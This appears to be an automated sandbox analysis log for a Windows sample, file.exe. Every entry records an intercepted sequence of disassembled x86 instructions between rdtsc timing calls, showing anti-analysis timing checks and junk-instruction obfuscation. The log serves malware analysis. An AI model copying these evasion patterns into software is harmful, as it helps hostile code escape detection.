                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50004C0 second address: 500050A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC408FC701Ch 0x00000012 xor ch, FFFFFFB8h 0x00000015 jmp 00007FC408FC701Bh 0x0000001a popfd 0x0000001b mov ch, BBh 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC408FC701Eh 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500050A second address: 500050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE04B2 second address: 4FE04D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC408FC7024h 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE04D9 second address: 4FE04F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 60C6BF4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, ecx 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC408FC8B0Dh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE04F6 second address: 4FE04FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE04FC second address: 4FE0500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500004C second address: 5000050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000050 second address: 5000056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000056 second address: 500007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC408FC701Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500007F second address: 5000083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000083 second address: 5000087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000087 second address: 500008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500008D second address: 5000093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000093 second address: 5000097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000097 second address: 50000BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ecx 0x00000012 mov edx, 013AB8DCh 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50000BE second address: 50000C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50000C4 second address: 50000C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000273 second address: 50002C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B0Fh 0x00000009 adc eax, 7F15937Eh 0x0000000f jmp 00007FC408FC8B19h 0x00000014 popfd 0x00000015 mov cx, 59C7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FC408FC8B0Ah 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC408FC8B0Eh 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50002C9 second address: 50002E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC7021h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020711 second address: 502073D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC408FC8B0Ch 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502073D second address: 502074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC701Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502074F second address: 502076B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502076B second address: 5020770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020770 second address: 50207F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC408FC8B0Ch 0x00000010 add ax, BF18h 0x00000015 jmp 00007FC408FC8B0Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FC408FC8B18h 0x00000021 adc al, 00000078h 0x00000024 jmp 00007FC408FC8B0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ecx 0x0000002c pushad 0x0000002d movzx ecx, dx 0x00000030 mov ecx, edx 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 mov esi, 41CCFB9Fh 0x0000003a mov dl, al 0x0000003c popad 0x0000003d xchg eax, ecx 0x0000003e pushad 0x0000003f mov edi, 1ABDB5F0h 0x00000044 mov esi, edi 0x00000046 popad 0x00000047 mov eax, dword ptr [76FB65FCh] 0x0000004c jmp 00007FC408FC8B0Bh 0x00000051 test eax, eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 mov ebx, eax 0x00000058 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50207F4 second address: 5020895 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC408FC701Eh 0x00000008 or eax, 467FF568h 0x0000000e jmp 00007FC408FC701Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC408FC7028h 0x0000001c sbb ch, FFFFFFC8h 0x0000001f jmp 00007FC408FC701Bh 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007FC47AEDA13Ah 0x0000002c pushad 0x0000002d mov di, cx 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 mov ecx, eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FC408FC701Fh 0x0000003e add si, D6BEh 0x00000043 jmp 00007FC408FC7029h 0x00000048 popfd 0x00000049 call 00007FC408FC7020h 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020895 second address: 502089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502089B second address: 502089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502089F second address: 50208DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FC408FC8B0Fh 0x00000010 and ecx, 1Fh 0x00000013 jmp 00007FC408FC8B16h 0x00000018 ror eax, cl 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop esi 0x0000001f movsx ebx, ax 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208DD second address: 50208E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50208E5 second address: 5020920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 jmp 00007FC408FC8B19h 0x0000000d retn 0004h 0x00000010 nop 0x00000011 mov esi, eax 0x00000013 lea eax, dword ptr [ebp-08h] 0x00000016 xor esi, dword ptr [00EB2014h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 call 00007FC40D17934Fh 0x00000028 push FFFFFFFEh 0x0000002a pushad 0x0000002b jmp 00007FC408FC8B0Ch 0x00000030 popad 0x00000031 pop eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020920 second address: 5020924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020924 second address: 502092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502092A second address: 5020930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020930 second address: 5020934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020934 second address: 502095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC40D17788Ch 0x00000010 mov edi, edi 0x00000012 jmp 00007FC408FC7029h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502095F second address: 5020963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020963 second address: 5020976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020976 second address: 5020A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC408FC8B17h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 call 00007FC408FC8B17h 0x0000001c pop ecx 0x0000001d popad 0x0000001e call 00007FC408FC8B19h 0x00000023 pushfd 0x00000024 jmp 00007FC408FC8B10h 0x00000029 sub si, E518h 0x0000002e jmp 00007FC408FC8B0Bh 0x00000033 popfd 0x00000034 pop ecx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FC408FC8B0Fh 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC408FC8B15h 0x00000045 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020A1E second address: 5020A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD006A second address: 4FD0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0079 second address: 4FD009F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, D678h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 51h 0x00000012 call 00007FC408FC7022h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD009F second address: 4FD00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 adc si, 4008h 0x0000000e jmp 00007FC408FC8B0Bh 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ecx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov dx, 3E02h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD00D2 second address: 4FD010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 call 00007FC408FC7025h 0x0000000a pop eax 0x0000000b pop edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e jmp 00007FC408FC701Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC408FC701Dh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD010E second address: 4FD0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0123 second address: 4FD0182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC7027h 0x00000008 pop eax 0x00000009 mov edx, 31E76F9Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push ebx 0x00000014 mov al, 0Ah 0x00000016 pop edi 0x00000017 popad 0x00000018 mov ebx, dword ptr [ebp+10h] 0x0000001b jmp 00007FC408FC7020h 0x00000020 xchg eax, esi 0x00000021 jmp 00007FC408FC7020h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC408FC701Eh 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0182 second address: 4FD01A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC8B10h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01A6 second address: 4FD01AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01AC second address: 4FD01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01B2 second address: 4FD01B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01B6 second address: 4FD01BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01BA second address: 4FD021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushfd 0x00000010 jmp 00007FC408FC7027h 0x00000015 xor ax, 169Eh 0x0000001a jmp 00007FC408FC7029h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov eax, 7C3E2603h 0x00000028 mov di, cx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC408FC7020h 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD021F second address: 4FD0254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5874h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 jmp 00007FC408FC8B0Dh 0x0000001b popad 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC408FC8B0Dh 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0254 second address: 4FD02ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC47AF253C2h 0x0000000f jmp 00007FC408FC701Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FC408FC7020h 0x00000020 je 00007FC47AF253ADh 0x00000026 pushad 0x00000027 push ecx 0x00000028 pushfd 0x00000029 jmp 00007FC408FC701Dh 0x0000002e xor ecx, 3D477256h 0x00000034 jmp 00007FC408FC7021h 0x00000039 popfd 0x0000003a pop esi 0x0000003b popad 0x0000003c mov edx, dword ptr [esi+44h] 0x0000003f jmp 00007FC408FC701Ah 0x00000044 or edx, dword ptr [ebp+0Ch] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC408FC7027h 0x0000004e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD02ED second address: 4FD0305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0305 second address: 4FD0398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007FC408FC7026h 0x00000016 jne 00007FC47AF2536Ch 0x0000001c jmp 00007FC408FC7020h 0x00000021 test byte ptr [esi+48h], 00000001h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC408FC701Eh 0x0000002c and cx, DAC8h 0x00000031 jmp 00007FC408FC701Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 pushfd 0x0000003a jmp 00007FC408FC7026h 0x0000003f and eax, 6A395D28h 0x00000045 jmp 00007FC408FC701Bh 0x0000004a popfd 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0398 second address: 4FD03E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FC47AF26E08h 0x0000000d pushad 0x0000000e call 00007FC408FC8B10h 0x00000013 call 00007FC408FC8B12h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a mov bx, ax 0x0000001d popad 0x0000001e test bl, 00000007h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC408FC8B14h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD03E9 second address: 4FD03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC08FE second address: 4FC0943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B17h 0x00000009 and eax, 6DA98A3Eh 0x0000000f jmp 00007FC408FC8B19h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0943 second address: 4FC0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0947 second address: 4FC094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC094D second address: 4FC0953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0953 second address: 4FC0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0957 second address: 4FC096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC408FC701Bh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC096F second address: 4FC09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC408FC8B0Eh 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC408FC8B0Eh 0x0000001a adc cl, 00000028h 0x0000001d jmp 00007FC408FC8B0Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 jmp 00007FC408FC8B16h 0x00000029 popad 0x0000002a popad 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC408FC8B16h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC09F2 second address: 4FC09F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC09F8 second address: 4FC0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B0Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A09 second address: 4FC0A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A0D second address: 4FC0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007FC408FC8B0Dh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov eax, 1E5A1663h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, 87D5h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A32 second address: 4FC0A4B instructions: 0x00000000 rdtsc 0x00000002 mov ch, CCh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx eax, di 0x0000000c mov edi, 6454239Ah 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A4B second address: 4FC0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A4F second address: 4FC0A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A69 second address: 4FC0A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A7B second address: 4FC0A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A8C second address: 4FC0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
